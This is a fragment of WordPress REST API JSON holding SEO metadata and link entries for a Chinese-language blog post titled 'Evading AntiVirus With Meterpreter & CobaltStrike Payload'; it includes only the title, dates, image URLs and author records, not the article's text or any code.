96&d=mm&r=g\",\"caption\":\"chengyunpu\"},\"logo\":{\"@id\":\"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/\"},\"sameAs\":[\"http:\/\/chengyunpu.com\/wordpress\"],\"url\":\"https:\/\/chengyunpu.com\/wordpress\/author\/chengyunpu\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload - my article","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/","og_locale":"zh_TW","og_type":"article","og_title":"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload - my article","og_description":"0x00 OSCP \u8003\u5b8c + \u7279\u6b8a\u9078\u624d\u4e0a [&hellip;]","og_url":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/","og_site_name":"my article","article_published_time":"2026-02-01T09:23:21+00:00","article_modified_time":"2026-02-04T23:31:41+00:00","og_image":[{"url":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png","type":"","width":"","height":""}],"author":"chengyunpu","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005:":"chengyunpu","\u9810\u4f30\u95b1\u8b80\u6642\u9593":"3 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#article","isPartOf":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/"},"author":{"name":"chengyunpu","@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411"},"headline":"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload","datePublished":"2026-02-01T09:23:21+00:00","dateModified":"2026-02-04T23:31:41+00:00","mainEntityOfPage":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/"},"wordCount":250,"commentCount":0,"publisher":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411"},"image":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#primaryimage"},"thumbnailUrl":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png","inLanguage":"zh-TW","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/","url":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/","name":"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload - my article","isPartOf":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#website"},"primaryImageOfPage":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#primaryimage"},"image":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#primaryimage"},"thumbnailUrl":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image-1024x471.png","datePublished":"2026-02-01T09:23:21+00:00","dateModified":"2026-02-04T23:31:41+00:00","breadcrumb":{"@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#breadcrumb"},"inLanguage":"zh-TW","potentialAction":[{"@type":"ReadAction","target":["https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/"]}]},{"@type":"ImageObject","inLanguage":"zh-TW","@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#primaryimage","url":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image.png","contentUrl":"https:\/\/chengyunpu.com\/wordpress\/wp-content\/uploads\/2026\/02\/image.png","width":1666,"height":767},{"@type":"BreadcrumbList","@id":"https:\/\/chengyunpu.com\/wordpress\/2026\/02\/01\/evading-antivirus-with-meterpreter-cobaltstrike-payload\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/chengyunpu.com\/wordpress\/"},{"@type":"ListItem","position":2,"name":"Evading AntiVirus With Meterpreter &amp; CobaltStrike Payload"}]},{"@type":"WebSite","@id":"https:\/\/chengyunpu.com\/wordpress\/#website","url":"https:\/\/chengyunpu.com\/wordpress\/","name":"my article","description":"","publisher":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/chengyunpu.com\/wordpress\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-TW"},{"@type":["Person","Organization"],"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/f697887c7eea19b57c04d0a2bb4d9411","name":"chengyunpu","image":{"@type":"ImageObject","inLanguage":"zh-TW","@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8e26f1a47b73420e32e35b25e19c6abf045eb208b1a34d5d90f5d166505983d2?s=96&d=mm&r=g","caption":"chengyunpu"},"logo":{"@id":"https:\/\/chengyunpu.com\/wordpress\/#\/schema\/person\/image\/"},"sameAs":["http:\/\/chengyunpu.com\/wordpress"],"url":"https:\/\/chengyunpu.com\/wordpress\/author\/chengyunpu\/"}]}},"_links":{"self":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts\/659","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/comments?post=659"}],"version-history":[{"count":33,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts\/659\/revisions"}],"predecessor-version":[{"id":703,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/posts\/659\/revisions\/703"}],"wp:attachment":[{"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/media?parent=659"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/categories?post=659"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/chengyunpu.com\/wordpress\/wp-json\/wp\/v2\/tags?post=659"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}